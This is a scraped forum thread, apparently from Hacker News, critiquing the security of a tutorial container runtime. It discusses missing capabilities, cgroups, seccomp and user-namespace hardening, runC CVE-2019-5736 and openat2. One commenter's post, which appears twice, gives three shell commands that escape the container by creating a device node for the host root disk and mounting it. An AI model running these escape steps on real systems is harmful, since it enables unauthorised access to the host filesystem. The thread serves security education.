Definitely not secure. The author did a great job explaining container runtimes in basic terms, but there's a lot of security features missing. Mainly:
* Reducing the container's capabilities
* Restricting access to resources through cgroups
* Applying seccomp filters to prevent certain syscalls.
As another comment suggested, user namespaces are another hardening feature, but not all container runtimes enable it by default. Podman does, Docker doesn't. In fact user namespaces are so powerful that I believe they pretty much cover most of the hardening provided by the three features I listed above. If you're wondering why they're not enabled by default in Docker, take a look at this [1].
Exploiting the missing isolation mechanisms, the following bash commands will allow you to escape from the author's containers:
$ ls -al /sys/dev/block # find the root fs device (e.g. /dev/sda1) major and minor device numbers (e.g. {maj=8, min=1}, {maj=259, min=1})
$ mknod --mode 0600 /dev/host_fs_dev b $major $minor
$ mkdir /host_fs && mount /dev/host_fs_dev /host_fs
(warning: shameless plug to my posts follows:)
If you want more details, I wrote a post on this exact same problem in the context of three vulnerabilities I found in rkt (another container runtime) [2].
Beside the issues above, the author's runtime also exposes host file descriptors like /proc/self/exe that can be used to escape the container. This is a post I wrote on runC CVE-2019-5736 that explains this kind of issues.
Thank you for detailed answer and interesting links!
Could you please explain/point me to some information/source, why docker can't use -net=host namespace if userns is enabled, while on the other hand rootlesskit[1] which uses userns by default, dont have problem with using host netns (--net=host) ?
Hi, OP here.
You're correct on the symlink point, they're the reason chrooting is needed, as they caused several vulnerabilities in Docker and Podman cp in the past. The good news is that there is a new syscall designed to solve that exact problem, openat2(), which you'll be able use to restrict path resolution when opening files (https://lwn.net/Articles/796868/). It will make helper processes and chrooting to the container redundant.
Running helper processes entirely in the container is actually quite problematic, since they will be visible to proceses in the container that could try to affect their output. This solution though is used in Kubernetes, and it resulted in 4 vulnerabilities in the last year. Ariel Zelivansky and I just gave a talk on the security of the cp command in KubeCon, you can check out the slides here (https://kccncna19.sched.com/event/d229f00f143036f7c488144e60...) for more information.
As for the fix, I'm pretty sure newer Golang versions stopped dynamiclly loading libraries at runtime, which is nice. I Should have included that in the post but forgot.
That's an option, an actually what LXD does. It's better then just chrooting, though in the case of this vulnerability even if docker-tar entered the mount NS, the exploit will still work.
As another comment suggested, user namespaces are another hardening feature, but not all container runtimes enable it by default. Podman does, Docker doesn't. In fact user namespaces are so powerful that I believe they pretty much cover most of the hardening provided by the three features I listed above. If you're wondering why they're not enabled by default in Docker, take a look at this [1].
Exploiting the missing isolation mechanisms, the following bash commands will allow you to escape from the author's containers:
$ ls -al /sys/dev/block # find the root fs device (e.g. /dev/sda1) major and minor device numbers (e.g. {maj=8, min=1}, {maj=259, min=1})
$ mknod --mode 0600 /dev/host_fs_dev b $major $minor
$ mkdir /host_fs && mount /dev/host_fs_dev /host_fs
(warning: shameless plug to my posts follows:)
If you want more details, I wrote a post on this exact same problem in the context of three vulnerabilities I found in rkt (another container runtime) [2].
Beside the issues above, the author's runtime also exposes host file descriptors like /proc/self/exe that can be used to escape the container. This is a post I wrote on runC CVE-2019-5736 that explains this kind of issues.
[1] https://docs.docker.com/engine/security/userns-remap/#user-n... [2] https://unit42.paloaltonetworks.com/breaking-out-of-coresos-... [3] https://unit42.paloaltonetworks.com/breaking-docker-via-runc...